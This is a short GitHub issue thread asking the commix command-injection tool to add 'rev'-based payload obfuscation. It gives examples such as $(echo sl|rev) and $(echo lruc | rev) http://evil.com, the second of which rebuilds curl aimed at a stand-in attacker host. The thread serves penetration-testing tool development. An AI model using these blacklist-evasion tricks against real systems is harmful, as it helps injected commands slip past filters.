commix icon indicating copy to clipboard operation
commix copied to clipboard

Feature Request: Linux Rev Command

Open xsuperbug opened this issue 6 years ago • 1 comments

Linux "rev" function can use to bypass some blacklists.

For example :

$(echo sl|rev) -> Ls command $(echo lruc | rev) http://evil.com -> Curl command

xsuperbug avatar Dec 10 '18 12:12 xsuperbug

They can also be used.

`echo sl|rev`
`printf sl|rev`

xsuperbug avatar Dec 11 '18 07:12 xsuperbug

Done https://github.com/commixproject/commix/commit/7f56f41cbabae0d9d325360a3ce85ebd0d50f5c8 @xsuperbug better late than never.

stasinopoulos avatar Jun 08 '23 05:06 stasinopoulos

This issue has been automatically locked since there has not been any recent activity after it was closed. Please open a new issue for related issues.

github-actions[bot] avatar Sep 07 '23 01:09 github-actions[bot]